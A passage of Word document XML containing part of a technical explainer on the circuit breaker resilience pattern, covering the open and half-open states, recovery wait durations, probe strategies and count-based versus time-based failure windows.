    <w:p w14:paraId="78C17826" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Business logic errors that aren't infrastructure failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B43B7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Specific expected error codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D18B56" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 OPEN State — Fail Fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB437F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB95680" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="987"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ALL requests are immediately rejected WITHOUT calling the downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77382D9C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="987"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The caller receives a fast failure response (circuit breaker exception or fallback).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413AB3F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="987"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>This lasts for a configured "wait duration" (recovery timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04168244" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="987"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The downstream receives ZERO traffic — breathing room to recover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E903062" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D1CF5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226CB880" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>State: OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEEC3A4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Opened at: 2026-05-28T14:30:05.000Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D44CCF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Wait duration: 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93800E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Transitions to HALF-OPEN at: 2026-05-28T14:30:35.000Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A497A4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Requests rejected since opening: 4,521</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625A4079" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What the caller experiences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B685041" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Instead of a 5-second timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDB8F7A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C0833" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Request → Circuit Breaker (OPEN) → Immediate rejection (&lt; 1ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B734DF0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>→ Fallback response returned to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2181DFFC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The recovery timeout — why it exists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A7A53" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If we immediately retry after opening the circuit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB38956" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="988"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The downstream might still be failing → we detect failure again → open again → immediate retry → fail → ... (tight loop).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A87127" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="988"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The downstream never gets quiet time to recover (GC, clear queues, reconnect to DB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36098E88" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The wait duration gives the downstream a guaranteed quiet period. It's the "healing time."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ADB513" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choosing the wait duration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E086BA6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Too short (2 seconds): Downstream hasn't recovered. Half-open probe fails. Circuit re-opens. Repeated quick probes add noise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34169FAA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Too long (5 minutes): Even if the downstream recovered after 10 seconds, the circuit stays open for another 4 minutes and 50 seconds. Users experience degradation unnecessarily long.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F806DC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Typical values: 15–60 seconds for network services. 5–30 seconds for in-cluster services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C1869" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 HALF-OPEN State — Testing Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B162F7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2E6A02" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="990"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>A LIMITED number of "probe" requests are allowed through to test if the downstream has recovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A5A51E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="990"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the probe succeeds → circuit transitions back to CLOSED (downstream is healthy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC5A4B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="990"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the probe fails → circuit transitions back to OPEN (downstream still broken, reset the timer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0ECC1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="990"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Non-probe requests continue to be rejected (fail-fast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E7652E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652170F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF7E370" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>State: HALF-OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD1782" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Permitted probe calls: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB8535" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Successful probes: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129217D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Failed probes: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A8BDC4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The probe strategy (varies by implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984BFF4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single probe (simplest):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C4AC82" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="991"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Allow exactly ONE request through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681AF242" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="991"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Success → CLOSED. Failure → OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCCB18E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="991"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Problem: One request is insufficient to determine health. A single lucky success might not indicate real recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C47DCA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiple probes (more robust):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A62C2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="992"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Allow N requests through (e.g., 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B850B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="992"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If success rate among probes ≥ threshold (e.g., 80%) → CLOSED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233BC54C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="992"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If failure rate exceeds threshold → OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470CC755" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="992"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Better statistical confidence in the recovery assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047CFBC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gradual ramp-up (most sophisticated):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF9408D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="993"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Start with 1 probe. If successful, allow 5 more. If still successful, allow 20. Then full traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E5896" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="993"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Essentially a "canary" approach to re-enabling traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309339B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="993"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Prevents overwhelming a just-recovered service with full load instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330D953B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="2287EC36">
          <v:rect id="_x0000_i4244" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B22BCB2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Failure Detection — The Measurement Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EADBE58" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Count-Based Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6C3354" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F9CCA5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="994"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Track the last N requests (e.g., last 100 requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CB972" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="994"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Calculate the failure rate among these N requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD32CA6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="994"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>If failure rate &gt; threshold → trip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6494CD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD54AB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495CF94" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Window size: 100 requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62494817" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Failure threshold: 50%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305F86B4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Minimum throughput: 10 requests (don't evaluate if &lt; 10 requests in window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBF73E4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="5ACDDD20" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Last 100 requests: 60 failures, 40 successes → 60% failure rate &gt; 50% → TRIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A8F2A9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Simple to implement. Deterministic behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7215A9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B5CD2F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="995"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Doesn't account for time. If traffic is low (1 request/minute), the window of 100 requests represents 100 minutes. The failures at the beginning might be 90 minutes old and no longer relevant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D6747" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="995"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Bursty traffic can trigger prematurely: 100 requests arrive in 1 second, 51 fail (temporary spike) → trips, even though the next 100 requests would all succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBFFB83" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Time-Based Sliding Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920BFEF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58700A84" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Track all requests within the last T seconds (e.g., last 60 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5049DC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Calculate failure rate within this window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2E69F1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>As time passes, old data slides out of the window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA32767" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation — Ring buffer approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2B8723" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Divide the window into buckets (e.g., 60-second window ÷ 10 buckets = 6-second buckets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EC3910" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
